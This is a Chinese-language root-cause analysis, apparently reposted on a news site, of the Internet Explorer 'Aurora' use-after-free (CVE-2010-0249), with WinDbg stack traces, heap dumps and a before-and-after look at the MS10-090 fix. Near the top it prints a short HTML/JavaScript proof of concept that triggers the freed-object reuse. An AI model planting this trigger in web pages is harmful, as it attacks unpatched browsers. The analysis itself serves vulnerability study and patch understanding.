CVE-2010-0249 IE EVENTPARAM::EVENTPARAM构造错误UAF漏洞(IE AURORA)
1. Poc
3.1 CEventObj
CEventObj对象地址为:04ce6fd0
3.2 EVENTPARAM
EVENTPARAM 对象的地址:054e5f08
设置EVENTPARAM的src element
上面语句运行前:
运行后:
从上面可以看到:
EVENTPARAM的src element对象为CInput元素。
多次中断后,释放CInput的CTreeNode元素。
当POC中脚本test2函数被执行时,
6.2 补丁后(MS10-090)
dc ecx
0455dfb0 0580ef88 057fefb0 00034235 00050001 ........5B......
0455dfc0 00000361 00000006 056e4fc0 05a86fc0 a........On..o..
0455dfd0 057fefc0 0455dfd8 00000062 00000000 ......U.b.......
0455dfe0 00000000 0455dfc0 0455dfc0 04b88fd8 ......U...U.....
0455dff0 00000042 00000000 00000000 d0d0d0d0 B...............
在补丁后,EVENTPARAM::EVENTPARAM构造函数中,会对引用的CTreeNode的引用计数进行增加,以免出现错误。
增加后,引用计数:
6.3 结论
在创建CEventObj时,会创建EVENTPARAM结构,如果新创建的CEventObj是从已有的CEventObj继承而来时,则这两个CEventObj事件的源相同。在新创建的EVENTPARAM结构的偏移0处的元素_pNode(CTreeNode),将复制源CEventObj该处的值。
在补丁前,上述过程没有增加CTreeNode的引用计数,在精心构造的html中,有可能导致CTreeNode已经释放,而EVENTPARAM的_pNode却仍然指向它,导致释放后重用。
补丁后,在EVENTPARAM::EVENTPARAM中,对上述情况作了处理,增加CTreeNode的引用计数,不会再导致问题
<html><script>var event2 = null;function test(){event2 = document.createEventObject(event);document.getElementById("x").innerHTML = "foo"; // 删除初始化了事件的元素window.setTimeout(test2, 100);}function test2(){alert(event2.srcElement); //在事件中访问已经删除了的元素}</script><body><div id="x"><input type="button" value="test" onclick="test()"></div></body></html>
2. 基本知识点
CEventObj +x04 _pparam; //EVENTPARAM * struct EVENTPARAM +x00 _pNode; // src element +x04 _pNodeFrom // for move,over,out +x08 _pNodeTo // for move,over,out
3. 元素的创建
当poc运行到该处时,会创建CEventObj对象。event2 = document.createEventObject(event);
3.1 CEventObj
CEventObj对象地址为:04ce6fd0
0:008> kvChildEBP RetAddr Args to Child 038fc280 63629173 038fc2bc 63786814 00000000 mshtml!CEventObj::CEventObj+0x1a (FPO: [0,0,0])038fc298 638b1cc3 038fc80c 04c7e6a8 00000000 mshtml!CEventObj::Create+0xb9038fc2d4 638e5b00 04d74fc8 0466afd0 038fc80c mshtml!CDocument::createEventObject+0x83038fc318 636430c9 04d74fc8 0445cfd0 0430dfd8 mshtml!Method_IDispatchpp_o0oVARIANTp+0xe6038fc38c 63643595 04d74fc8 00000446 00000001 mshtml!CBase::ContextInvokeEx+0x5d1038fc3b8 63643832 04d74fc8 00000446 00000001 mshtml!CBase::InvokeEx+0x25038fc408 635e1cdc 04d74fc8 0000000b 00000446 mshtml!DispatchInvokeCollection+0x14b038fc450 63642f30 04d74fc8 00000446 00000001 mshtml!CDocument::InvokeEx+0xf1038fc478 63642eec 04d74fc8 00000446 00000001 mshtml!CBase::VersionedInvokeEx+0x20038fc4c8 633a6d37 05416fd8 00000446 00000001 mshtml!PlainInvokeEx+0xea038fc508 633a6c75 04440d10 00000446 00000409 jscript!IDispatchExInvokeEx2+0xf8038fc544 633a9cfe 04440d10 00000409 00000003 jscript!IDispatchExInvokeEx+0x6a038fc604 633a9f3c 00000446 00000003 038fc804 jscript!InvokeDispatchEx+0x98038fc638 633a77ff 04440d10 038fc66c 00000003 jscript!VAR::InvokeByName+0x135038fc684 633a85c7 04440d10 00000003 038fc804 jscript!VAR::InvokeDispName+0x7a038fc6b0 633a83a9 04440d10 00000000 00000003 jscript!VAR::InvokeByDispID+0xce038fc84c 633a5ab0 038fc864 038fc9ac 038fc9ac jscript!CScriptRuntime::Run+0x28ab038fc934 633a59f7 038fc9ac 00000000 04488f30 jscript!ScrFncObj::CallWithFrameOnStack+0xff038fc980 633a5743 038fc9ac 00000000 04488f30 jscript!ScrFncObj::Call+0x8f038fc9fc 633a8bc7 0448af88 038fedf8 00000000 jscript!CSession::Execute+0x175038fcae4 633a8a35 0448af88 00000000 00000001 jscript!NameTbl::InvokeDef+0x1b8038fcb68 633a6d37 0448af88 00000000 00000001 jscript!NameTbl::InvokeEx+0x129038fcba8 633a6c75 04440d10 00000000 00000001 jscript!IDispatchExInvokeEx2+0xf8038fcbe4 63399186 04440d10 00000001 00000001 jscript!IDispatchExInvokeEx+0x6a038fcc74 635fe083 038fcc38 00000004 00000001 jscript!NameTbl::InvokeEx+0x372038fccac 635fdfab 063f8fb0 00000001 00000001 mshtml!CScriptCollection::InvokeEx+0x8a038fed20 63642f30 04d78eb8 00002712 00000001 mshtml!CWindow::InvokeEx+0x6a9038fed48 63642eec 04d78eb8 00002712 00000001 mshtml!CBase::VersionedInvokeEx+0x20038fed98 63643898 05418fd8 00002712 00000001 mshtml!PlainInvokeEx+0xea038fee08 636435c4 04d7afa0 00002712 00000001 mshtml!COmWindowProxy::InvokeEx+0x338038fee30 63642f30 04d7afa0 00002712 00000001 mshtml!COmWindowProxy::subInvokeEx+0x26038fee58 63642eec 04d7afa0 00002712 00000001 mshtml!CBase::VersionedInvokeEx+0x20038feea8 633a6d37 05f2afd8 00002712 00000001 mshtml!PlainInvokeEx+0xea038feee8 633a6c75 04440d10 00002712 00000409 jscript!IDispatchExInvokeEx2+0xf8038fef24 633a9cfe 04440d10 00000409 00000001 jscript!IDispatchExInvokeEx+0x6a038fefe4 633a9d79 00002712 00000001 00000000 jscript!InvokeDispatchEx+0x98038ff010 633a9c0b 04440d10 00000000 00000001 jscript!VAR::InvokeByDispID+0x154038ff1ac 633a5ab0 038ff1c4 038ff30c 038ff30c jscript!CScriptRuntime::Run+0x2989038ff294 633a59f7 038ff30c 00000000 04488fd0 jscript!ScrFncObj::CallWithFrameOnStack+0xff038ff2e0 633a5743 038ff30c 00000000 04488fd0 jscript!ScrFncObj::Call+0x8f038ff35c 633a8bc7 044aaf88 038ff5a0 00000000 jscript!CSession::Execute+0x175038ff444 633a8a35 044aaf88 00000000 00000001 jscript!NameTbl::InvokeDef+0x1b8038ff4c8 635c3039 044aaf88 00000000 00000804 jscript!NameTbl::InvokeEx+0x129038ff518 635c2f51 04381f88 044aaf88 00000000 mshtml!CBase::InvokeDispatchWithThis+0x1e0038ff644 636294ce fffffda8 80011778 05eeafd8 mshtml!CBase::InvokeEvent+0x213038ff7a4 635f377c 04381f88 04c7e6a8 04381f88 mshtml!CBase::FireEvent+0xe2038ff81c 6362b142 04381f88 04e0afb0 00000000 mshtml!CElement::BubbleEventHelper+0x2e3038ff984 636b2cc3 63649ccc 00000001 04e0afb0 mshtml!CElement::FireEvent+0x2d1038ff9a4 636b2c77 04e0afb0 00000000 038ffa78 mshtml!CElement::Fire_onclick+0x1c038ff9e0 6398f178 038ffaf8 04e0afb0 00000000 mshtml!CElement::DoClick+0x95038ffa08 636b2b5a 038ffaf8 04e0afb0 00000000 mshtml!CInput::DoClick+0x3f038ffaa4 635f1fea 038ffaf8 04c6cfb0 00000000 mshtml!CDoc::PumpMessage+0xf10038ffc1c 636b58c4 00000202 00000000 001e002d mshtml!CDoc::OnMouseMessage+0x55d038ffd4c 6364207a 04c7e6a8 00000202 00000000 mshtml!CDoc::OnWindowMessage+0x9d9038ffd78 77d18734 00330350 00000202 00000000 mshtml!CServer::WndProc+0x78038ffda4 77d18816 6364202e 00330350 00000202 USER32!InternalCallWinProc+0x28038ffe0c 77d189cd 00000000 6364202e 00330350 USER32!UserCallWinProcCheckWow+0x150 (FPO: [Non-Fpo])038ffe6c 77d18a10 038ffe94 00000000 038ffeec USER32!DispatchMessageWorker+0x306 (FPO: [Non-Fpo])038ffe7c 02692ec9 038ffe94 00000000 01caaf58 USER32!DispatchMessageW+0xf (FPO: [Non-Fpo])038ffeec 026348bf 045d6808 0040128e 0309eff0 IEFRAME!CTabWindow::_TabWindowThreadProc+0x461 (FPO: [Non-Fpo])038fffa4 5de05a60 01caaf58 7c817067 038fffec IEFRAME!LCIETab_ThreadProc+0x2c1 (FPO: [Non-Fpo])038fffb4 7c80b713 0309eff0 0040128e 7c817067 iertutil!CIsoScope::RegisterThread+0xab (FPO: [Non-Fpo])038fffec 00000000 5de05a52 0309eff0 00000000 kernel32!BaseThreadStart+0x37 (FPO: [Non-Fpo])
3.2 EVENTPARAM
EVENTPARAM 对象的地址:054e5f08
0:008> kvChildEBP RetAddr Args to Child 038fc264 635f3ba8 054e5f08 04c7e6a8 00000000 mshtml!EVENTPARAM::EVENTPARAM+0x51038fc298 638b1cc3 038fc80c 04c7e6a8 00000000 mshtml!CEventObj::Create+0xd4038fc2d4 638e5b00 04d74fc8 0466afd0 038fc80c mshtml!CDocument::createEventObject+0x83038fc318 636430c9 04d74fc8 0445cfd0 0430dfd8 mshtml!Method_IDispatchpp_o0oVARIANTp+0xe6038fc38c 63643595 04d74fc8 00000446 00000001 mshtml!CBase::ContextInvokeEx+0x5d1038fc3b8 63643832 04d74fc8 00000446 00000001 mshtml!CBase::InvokeEx+0x25038fc408 635e1cdc 04d74fc8 0000000b 00000446 mshtml!DispatchInvokeCollection+0x14b038fc450 63642f30 04d74fc8 00000446 00000001 mshtml!CDocument::InvokeEx+0xf1038fc478 63642eec 04d74fc8 00000446 00000001 mshtml!CBase::VersionedInvokeEx+0x20038fc4c8 633a6d37 05416fd8 00000446 00000001 mshtml!PlainInvokeEx+0xea038fc508 633a6c75 04440d10 00000446 00000409 jscript!IDispatchExInvokeEx2+0xf8038fc544 633a9cfe 04440d10 00000409 00000003 jscript!IDispatchExInvokeEx+0x6a038fc604 633a9f3c 00000446 00000003 038fc804 jscript!InvokeDispatchEx+0x98038fc638 633a77ff 04440d10 038fc66c 00000003 jscript!VAR::InvokeByName+0x135038fc684 633a85c7 04440d10 00000003 038fc804 jscript!VAR::InvokeDispName+0x7a038fc6b0 633a83a9 04440d10 00000000 00000003 jscript!VAR::InvokeByDispID+0xce038fc84c 633a5ab0 038fc864 038fc9ac 038fc9ac jscript!CScriptRuntime::Run+0x28ab038fc934 633a59f7 038fc9ac 00000000 04488f30 jscript!ScrFncObj::CallWithFrameOnStack+0xff038fc980 633a5743 038fc9ac 00000000 04488f30 jscript!ScrFncObj::Call+0x8f038fc9fc 633a8bc7 0448af88 038fedf8 00000000 jscript!CSession::Execute+0x175038fcae4 633a8a35 0448af88 00000000 00000001 jscript!NameTbl::InvokeDef+0x1b8038fcb68 633a6d37 0448af88 00000000 00000001 jscript!NameTbl::InvokeEx+0x129038fcba8 633a6c75 04440d10 00000000 00000001 jscript!IDispatchExInvokeEx2+0xf8038fcbe4 63399186 04440d10 00000001 00000001 jscript!IDispatchExInvokeEx+0x6a038fcc74 635fe083 038fcc38 00000004 00000001 jscript!NameTbl::InvokeEx+0x372038fccac 635fdfab 063f8fb0 00000001 00000001 mshtml!CScriptCollection::InvokeEx+0x8a038fed20 63642f30 04d78eb8 00002712 00000001 mshtml!CWindow::InvokeEx+0x6a9038fed48 63642eec 04d78eb8 00002712 00000001 mshtml!CBase::VersionedInvokeEx+0x20038fed98 63643898 05418fd8 00002712 00000001 mshtml!PlainInvokeEx+0xea038fee08 636435c4 04d7afa0 00002712 00000001 mshtml!COmWindowProxy::InvokeEx+0x338038fee30 63642f30 04d7afa0 00002712 00000001 mshtml!COmWindowProxy::subInvokeEx+0x26038fee58 63642eec 04d7afa0 00002712 00000001 mshtml!CBase::VersionedInvokeEx+0x20038feea8 633a6d37 05f2afd8 00002712 00000001 mshtml!PlainInvokeEx+0xea038feee8 633a6c75 04440d10 00002712 00000409 jscript!IDispatchExInvokeEx2+0xf8
设置EVENTPARAM的src element
上面语句运行前:
运行后:
CTreeNodedc 04e0afb004e0afb0 04381f88 04324fb0 00034235 00050001 ..8..O2.5B......04e0afc0 00000361 00000006 039cefc0 043abfc0 a.............:.04e0afd0 04324fc0 04e0afd8 00000062 00000000 .O2.....b.......04e0afe0 00000000 04e0afc0 04e0afc0 05692fd8 ............./i.04e0aff0 00000032 00000000 00000000 d0d0d0d0 2............... 0:008> !heap -p -a 04e0afb0 address 04e0afb0 found in _DPH_HEAP_ROOT @ 151000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) 4cfd478: 4e0afb0 4c - 4e0a000 2000 7c938f01 ntdll!RtlAllocateHeap+0x00000e64 635a8225 mshtml!CHtmRootParseCtx::BeginElement+0x00000030 635bc1e9 mshtml!CHtmTextParseCtx::BeginElement+0x0000006c 635a8420 mshtml!CHtmParse::BeginElement+0x000000b7 635a93b4 mshtml!CHtmParse::ParseBeginTag+0x000000fe 635a6bb6 mshtml!CHtmParse::ParseToken+0x00000082 635a7ff4 mshtml!CHtmPost::ProcessTokens+0x00000237 635a734c mshtml!CHtmPost::Exec+0x00000221 635ac2b8 mshtml!CHtmPost::Run+0x00000015 635ac21b mshtml!PostManExecute+0x000001fd 635ac17e mshtml!PostManResume+0x000000f8 635ac0e2 mshtml!CHtmPost::OnDwnChanCallback+0x00000010 63655d60 mshtml!CDwnChan::OnMethodCall+0x00000019 6364de62 mshtml!GlobalWndOnMethodCall+0x000000fb 6363c3c5 mshtml!GlobalWndProc+0x0000018377d18734 USER32!InternalCallWinProc+0x00000028 0:008> dc 04381f8804381f88 6377a8e0 00000007 00000020 04399fe8 ..wc.... .....9.04381f98 01d36f50 04e0afb0 00000135 822822a0 Po......5...."(.04381fa8 00000002 0566cef0 6377ab1c 0000c001 ......f...wc....04381fb8 00000000 00000000 00000000 04df8ff4 ................04381fc8 04adcff4 00000000 00000000 00000000 ................04381fd8 00000000 00000000 020108e0 00000000 ................04381fe8 00000000 00000000 0000ffff 00000000 ................04381ff8 00000000 6377a8c4 ???????? ???????? ......wc????????0:008> !heap -p -a 04381f88 address 04381f88 found in _DPH_HEAP_ROOT @ 151000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) 54e7708: 4381f88 78 - 4381000 2000 mshtml!CInput::`vftable' 7c938f01 ntdll!RtlAllocateHeap+0x00000e64 6377a7d9 mshtml!CInput::CreateElement+0x00000015 6377a7a1 mshtml!CreateInputElement+0x00000060 635a67f5 mshtml!CreateElement+0x00000043 635a9399 mshtml!CHtmParse::ParseBeginTag+0x000000e3 635a6bb6 mshtml!CHtmParse::ParseToken+0x00000082 635a7ff4 mshtml!CHtmPost::ProcessTokens+0x00000237 635a734c mshtml!CHtmPost::Exec+0x00000221 635ac2b8 mshtml!CHtmPost::Run+0x00000015 635ac21b mshtml!PostManExecute+0x000001fd 635ac17e mshtml!PostManResume+0x000000f8 635ac0e2 mshtml!CHtmPost::OnDwnChanCallback+0x00000010 63655d60 mshtml!CDwnChan::OnMethodCall+0x00000019 6364de62 mshtml!GlobalWndOnMethodCall+0x000000fb 6363c3c5 mshtml!GlobalWndProc+0x00000183 77d18734 USER32!InternalCallWinProc+0x00000028
从上面可以看到:
EVENTPARAM的src element对象为CInput元素。
4. 元素的释放
当poc运行到下面的语句时,document.getElementById("x").innerHTML = "foo"; // 删除初始化了事件的元素
将会释放CInput元素。多次中断后,释放CInput的CTreeNode元素。
5. 重用
function test2()
{
alert(event2.srcElement); //在事件中访问已经删除了的元素
}
当CInput的CTreeNode已经被释放时,EVENTPARAM的src element却仍然执行被释放的CTreeNode。{
alert(event2.srcElement); //在事件中访问已经删除了的元素
}
0:008> dc 054e5f08054e5f08 04e0afb0 00000000 00000000 00000000 ................054e5f18 00000000 00000000 00000146 0000013d ........F...=...054e5f28 0000002d 0000001e 0000001e 0000000a -...............054e5f38 0000002d 0000001e 00000000 00000000 -...............054e5f48 00000000 ffffffff 00000000 00000000 ................054e5f58 00000000 00000000 00000000 00000000 ................054e5f68 00000000 04c7e6a8 00000000 063a8f30 ............0.:.054e5f78 00000000 00000000 ffffffff ffffffff ................
当POC中脚本test2函数被执行时,
function test2()
{
alert(event2.srcElement); //在事件中访问已经删除了的元素
}
会导致重用。{
alert(event2.srcElement); //在事件中访问已经删除了的元素
}
038ff4ac 637b0781 04ce6fd0 04488f78 000003e9 mshtml!CEventObj::GenericGetElement+0x91038ff4c0 6379351c 04ce6fd0 04488f78 04466fd0 mshtml!CEventObj::get_srcElement+0x15038ff4f0 636430c9 04ce6fd0 04466fd0 04d84fd8 mshtml!GS_IDispatchp+0x9b038ff564 63643595 04ce6fd0 000003e9 00000001 mshtml!CBase::ContextInvokeEx+0x5d1038ff590 63642f30 04ce6fd0 000003e9 00000001 mshtml!CBase::InvokeEx+0x25038ff5b8 63642eec 04ce6fd0 000003e9 00000001 mshtml!CBase::VersionedInvokeEx+0x20038ff608 633a6d37 0430dfd8 000003e9 00000001 mshtml!PlainInvokeEx+0xea038ff648 633a6c75 04440d10 000003e9 00000409 jscript!IDispatchExInvokeEx2+0xf8038ff684 633a9cfe 04440d10 00000409 00000002 jscript!IDispatchExInvokeEx+0x6a038ff744 633a9f3c 000003e9 00000002 04488f70 jscript!InvokeDispatchEx+0x98038ff77c 633a99b7 04440d10 038ff8a4 00000002 jscript!VAR::InvokeByName+0x135038ff914 633a5ab0 038ff92c 038ffa74 038ffa74 jscript!CScriptRuntime::Run+0x655038ff9fc 633a59f7 038ffa74 00000000 00000000 jscript!ScrFncObj::CallWithFrameOnStack+0xff038ffa48 633a5743 038ffa74 00000000 00000000 jscript!ScrFncObj::Call+0x8f038ffac4 633a8bc7 0448cf88 038ffcd4 00000000 jscript!CSession::Execute+0x175038ffbac 633a8a35 0448cf88 00000000 00000001 jscript!NameTbl::InvokeDef+0x1b8038ffc30 633a9153 0448cf88 00000000 00000000 jscript!NameTbl::InvokeEx+0x129038ffc58 636867fa 0448cf88 00000000 63633600 jscript!NameTbl::Invoke+0x70038ffcec 6368675a 04d78eb8 06380fe8 04cd8d58 mshtml!CWindow::ExecuteTimeoutScript+0x87038ffd44 6368664a 04d78eb8 04d78ef5 038ffd78 mshtml!CWindow::FireTimeOut+0xb6038ffd54 63686656 00002009 038ffde0 6363c317 mshtml!CStackDataAry<TIMERTHREADADVISE,12>::GetStackSize+0xb6038ffd78 77d18734 006401dc 0000000f 00002009 mshtml!GlobalWndProc+0x183038ffda4 77d18816 6363c317 006401dc 00000113 USER32!InternalCallWinProc+0x28038ffe0c 77d189cd 00000000 6363c317 006401dc USER32!UserCallWinProcCheckWow+0x150 (FPO: [Non-Fpo])038ffe6c 77d18a10 038ffe94 00000000 038ffeec USER32!DispatchMessageWorker+0x306 (FPO: [Non-Fpo])038ffe7c 02692ec9 038ffe94 00000000 01caaf58 USER32!DispatchMessageW+0xf (FPO: [Non-Fpo])038ffeec 026348bf 045d6808 0040128e 0309eff0 IEFRAME!CTabWindow::_TabWindowThreadProc+0x461 (FPO: [Non-Fpo])038fffa4 5de05a60 01caaf58 7c817067 038fffec IEFRAME!LCIETab_ThreadProc+0x2c1 (FPO: [Non-Fpo])038fffb4 7c80b713 0309eff0 0040128e 7c817067 iertutil!CIsoScope::RegisterThread+0xab (FPO: [Non-Fpo])038fffec 00000000 5de05a52 0309eff0 00000000 kernel32!BaseThreadStart+0x37 (FPO: [Non-Fpo])
6. 补丁对比
6.1 补丁前6.2 补丁后(MS10-090)
0:008> kvChildEBP RetAddr Args to Child 031da1c4 3db1a542 05adaf08 042656a8 00000000 mshtml!EVENTPARAM::EVENTPARAM+0x17c031da1f8 3dda56c2 031da76c 042656a8 00000000 mshtml!CEventObj::Create+0xd4031da234 3dddb4f7 04394fc8 05a5cfd0 031da76c mshtml!CDocument::createEventObject+0x83031da278 3db6af13 04394fc8 03b60fd0 05728fd8 mshtml!Method_IDispatchpp_o0oVARIANTp+0xe6031da2ec 3db6b3c2 04394fc8 00000446 00000001 mshtml!CBase::ContextInvokeEx+0x5d1031da318 3db6b5b6 04394fc8 00000446 00000001 mshtml!CBase::InvokeEx+0x25031da368 3dae0bc8 04394fc8 0000000b 00000446 mshtml!DispatchInvokeCollection+0x14b031da3b0 3db6a955 04394fc8 00000446 00000001 mshtml!CDocument::InvokeEx+0xf1031da3d8 3db6a911 04394fc8 00000446 00000001 mshtml!CBase::VersionedInvokeEx+0x20031da428 633a6d37 055c2fd8 00000446 00000001 mshtml!PlainInvokeEx+0xea031da468 633a6c75 03bcad10 00000446 00000409 jscript!IDispatchExInvokeEx2+0xf8031da4a4 633a9cfe 03bcad10 00000409 00000003 jscript!IDispatchExInvokeEx+0x6a031da564 633a9f3c 00000446 00000003 031da764 jscript!InvokeDispatchEx+0x98031da598 633a77ff 03bcad10 031da5cc 00000003 jscript!VAR::InvokeByName+0x135031da5e4 633a85c7 03bcad10 00000003 031da764 jscript!VAR::InvokeDispName+0x7a031da610 633a83a9 03bcad10 00000000 00000003 jscript!VAR::InvokeByDispID+0xce031da7ac 633a5ab0 031da7c4 031da90c 031da90c jscript!CScriptRuntime::Run+0x28ab031da894 633a59f7 031da90c 00000000 03b7af30 jscript!ScrFncObj::CallWithFrameOnStack+0xff031da8e0 633a5743 031da90c 00000000 03b7af30 jscript!ScrFncObj::Call+0x8f031da95c 633a8bc7 03b7cf88 031dcd58 00000000 jscript!CSession::Execute+0x175031daa44 633a8a35 03b7cf88 00000000 00000001 jscript!NameTbl::InvokeDef+0x1b8031daac8 633a6d37 03b7cf88 00000000 00000001 jscript!NameTbl::InvokeEx+0x129031dab08 633a6c75 03bcad10 00000000 00000001 jscript!IDispatchExInvokeEx2+0xf8031dab44 63399186 03bcad10 00000001 00000001 jscript!IDispatchExInvokeEx+0x6a031dabd4 3dac7fdf 031dab98 00000004 00000001 jscript!NameTbl::InvokeEx+0x372031dac0c 3db6b728 05606fb0 00000001 00000001 mshtml!CScriptCollection::InvokeEx+0x8a031dcc80 3db6a955 04398eb8 00002712 00000001 mshtml!CWindow::InvokeEx+0x6a9031dcca8 3db6a911 04398eb8 00002712 00000001 mshtml!CBase::VersionedInvokeEx+0x20031dccf8 3db6b7c2 055c4fd8 00002712 00000001 mshtml!PlainInvokeEx+0xea031dcd68 3db6b1f2 0439afa0 00002712 00000001 mshtml!COmWindowProxy::InvokeEx+0x338
dc ecx
0455dfb0 0580ef88 057fefb0 00034235 00050001 ........5B......
0455dfc0 00000361 00000006 056e4fc0 05a86fc0 a........On..o..
0455dfd0 057fefc0 0455dfd8 00000062 00000000 ......U.b.......
0455dfe0 00000000 0455dfc0 0455dfc0 04b88fd8 ......U...U.....
0455dff0 00000042 00000000 00000000 d0d0d0d0 B...............
在补丁后,EVENTPARAM::EVENTPARAM构造函数中,会对引用的CTreeNode的引用计数进行增加,以免出现错误。
增加后,引用计数:
dc 0455dfb0 0455dfb0 0580ef88 057fefb0 00034235 00050001 ........5B......0455dfc0 00000361 00000006 056e4fc0 05a86fc0 a........On..o..0455dfd0 057fefc0 0455dfd8 00000062 00000000 ......U.b.......0455dfe0 00000000 0455dfc0 0455dfc0 04b88fd8 ......U...U.....0455dff0 0000004a 00000000 00000000 d0d0d0d0 J...............
6.3 结论
在创建CEventObj时,会创建EVENTPARAM结构,如果新创建的CEventObj是从已有的CEventObj继承而来时,则这两个CEventObj事件的源相同。在新创建的EVENTPARAM结构的偏移0处的元素_pNode(CTreeNode),将复制源CEventObj该处的值。
在补丁前,上述过程没有增加CTreeNode的引用计数,在精心构造的html中,有可能导致CTreeNode已经释放,而EVENTPARAM的_pNode却仍然指向它,导致释放后重用。
补丁后,在EVENTPARAM::EVENTPARAM中,对上述情况作了处理,增加CTreeNode的引用计数,不会再导致问题
>更多相关文章
首页推荐
佛山市东联科技有限公司一直秉承“一切以用户价值为依归
- 01-11全球最受赞誉公司揭晓:苹果连续九年第一
- 12-09罗伯特·莫里斯:让黑客真正变黑
- 12-09谁闯入了中国网络?揭秘美国绝密黑客小组TA
- 12-09警示:iOS6 惊现“闪退”BUG
- 12-05亚马逊推出新一代基础模型 任意模态生成大模
- 12-05OpenAI拓展欧洲业务 将在苏黎世设立办公室
- 12-05微软质疑美国联邦贸易委员会泄露信息 督促其
- 12-05联交所取消宝宝树上市地位 宝宝树:不会对公
- 12-04企业微信致歉:文档打开异常已完成修复
相关文章
24小时热门资讯
24小时回复排行
热门推荐
最新资讯
操作系统
黑客防御